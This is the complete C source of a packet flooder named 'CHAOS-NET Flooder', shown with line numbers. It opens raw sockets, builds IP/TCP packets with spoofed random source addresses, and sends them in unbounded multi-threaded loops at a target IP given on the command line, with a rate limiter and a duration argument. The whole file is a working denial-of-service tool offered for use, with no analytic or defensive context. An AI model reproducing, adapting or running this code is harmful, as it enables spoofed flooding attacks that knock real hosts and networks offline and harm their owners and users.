1
#include <unistd.h>
2
#include <time.h>
3
#include <sys/types.h>
4
#include <sys/socket.h>
5
#include <sys/ioctl.h>
6
#include <string.h>
7
#include <stdlib.h>
8
#include <stdio.h>
9
#include <pthread.h>
10
#include <netinet/tcp.h>
11
#include <netinet/ip.h>
12
#include <netinet/in.h>
13
#include <netinet/if_ether.h>
14
#include <netdb.h>
15
#include <net/if.h>
16
#include <arpa/inet.h>
17

18
#define MAX_PACKET_SIZE 65534
19
#define PHI 0x9e3779b9
20

21
static unsigned long int Q[4096], c = 362436;
22
volatile int limiter;
23
volatile unsigned int pps;
24
volatile unsigned int sleeptime = 100;
25

26
void init_rand(unsigned long int x)
27
{
28
	int i;
29
	Q[0] = x;
30
	Q[1] = x + PHI;
31
	Q[2] = x + PHI + PHI;
32
	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
33
}
34
unsigned long int rand_cmwc(void)
35
{
36
	unsigned long long int t, a = 18782LL;
37
	static unsigned long int i = 4095;
38
	unsigned long int x, r = 0xfffffffe;
39
	i = (i + 1) & 4095;
40
	t = a * Q[i] + c;
41
	c = (t >> 32);
42
	x = t + c;
43
	if (x < c) {
44
		x++;
45
		c++;
46
	}
47
	return (Q[i] = r - x);
48
}
49
unsigned short csum (unsigned short *buf, int count)
50
{
51
	register unsigned long sum = 0;
52
	while( count > 1 ) { sum += *buf++; count -= 2; }
53
	if(count > 0) { sum += *(unsigned char *)buf; }
54
	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
55
	return (unsigned short)(~sum);
56
}
57

58
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
59

60
	struct tcp_pseudo
61
	{
62
		unsigned long src_addr;
63
		unsigned long dst_addr;
64
		unsigned char zero;
65
		unsigned char proto;
66
		unsigned short length;
67
	} pseudohead;
68
	unsigned short total_len = iph->tot_len;
69
	pseudohead.src_addr=iph->saddr;
70
	pseudohead.dst_addr=iph->daddr;
71
	pseudohead.zero=0;
72
	pseudohead.proto=IPPROTO_TCP;
73
	pseudohead.length=htons(sizeof(struct tcphdr));
74
	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
75
	unsigned short *tcp = malloc(totaltcp_len);
76
	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
77
	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
78
	unsigned short output = csum(tcp,totaltcp_len);
79
	free(tcp);
80
	return output;
81
}
82

83
void setup_ip_header(struct iphdr *iph)
84
{
85
	iph->ihl = 5;
86
	iph->version = 4;
87
	iph->tos = 0;
88
	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
89
	iph->id = htonl(54321);
90
	iph->frag_off = 0;
91
	iph->ttl = MAXTTL;
92
	iph->protocol = 16; //PROTO 16 CHAOS_NET
93
	iph->check = 0;
94
	iph->saddr = inet_addr("192.168.3.100");
95
}
96

97
void setup_tcp_header(struct tcphdr *tcph)
98
{
99
	tcph->source = rand();
100
	tcph->seq = rand();
101
	tcph->ack_seq = rand();
102
	tcph->res2 = 0;
103
	tcph->doff = 5;
104
	tcph->ack = 1;
105
	tcph->window = htons(65535);
106
	tcph->check = 0;
107
	tcph->urg_ptr = 0;
108
}
109

110
void *flood(void *par1)
111
{
112
	char *td = (char *)par1;
113
	char datagram[MAX_PACKET_SIZE];
114
	struct iphdr *iph = (struct iphdr *)datagram;
115
	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
116
	
117
	struct sockaddr_in sin;
118
	sin.sin_family = AF_INET;
119
	sin.sin_port = rand();
120
	sin.sin_addr.s_addr = inet_addr(td);
121

122
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
123
	if(s < 0){
124
		fprintf(stderr, "Could not open raw socket.\n");
125
		exit(-1);
126
	}
127
	memset(datagram, 0, MAX_PACKET_SIZE);
128
	setup_ip_header(iph);
129
	setup_tcp_header(tcph);
130

131
	tcph->dest = rand();
132

133
	iph->daddr = sin.sin_addr.s_addr;
134
	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
135

136
	int tmp = 1;
137
	const int *val = &tmp;
138
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
139
		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
140
		exit(-1);
141
	}
142

143
	init_rand(time(NULL));
144
	register unsigned int i;
145
	i = 0;
146
	while(1){
147
		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
148

149
		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
150
		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
151
		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
152
		tcph->seq = rand_cmwc() & 0xFFFF;
153
		tcph->source = htons(rand_cmwc() & 0xFFFF);
154
		tcph->check = 0;
155
		tcph->check = tcpcsum(iph, tcph);
156
		
157
		pps++;
158
		if(i >= limiter)
159
		{
160
			i = 0;
161
			usleep(sleeptime);
162
		}
163
		i++;
164
	}
165
}
166
int main(int argc, char *argv[ ])
167
{
168
	if(argc < 5){
169
		fprintf(stderr, "CHAOS-NET Flooder!\n");
170
		fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
171
		exit(-1);
172
	}
173

174
	fprintf(stdout, "Setting up Sockets...\n");
175

176
	int num_threads = atoi(argv[2]);
177
	int maxpps = atoi(argv[3]);
178
	limiter = 0;
179
	pps = 0;
180
	pthread_t thread[num_threads];
181
	
182
	int multiplier = 100;
183

184
	int i;
185
	for(i = 0;i<num_threads;i++){
186
		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
187
	}
188
	fprintf(stdout, "Starting Flood...\n");
189
	for(i = 0;i<(atoi(argv[4])*multiplier);i++)
190
	{
191
		usleep((1000/multiplier)*1000);
192
		if((pps*multiplier) > maxpps)
193
		{
194
			if(1 > limiter)
195
			{
196
				sleeptime+=100;
197
			} else {
198
				limiter--;
199
			}
200
		} else {
201
			limiter++;
202
			if(sleeptime > 25)
203
			{
204
				sleeptime-=25;
205
			} else {
206
				sleeptime = 0;
207
			}
208
		}
209
		pps = 0;
210
	}
211

212
	return 0;
213
}
214

215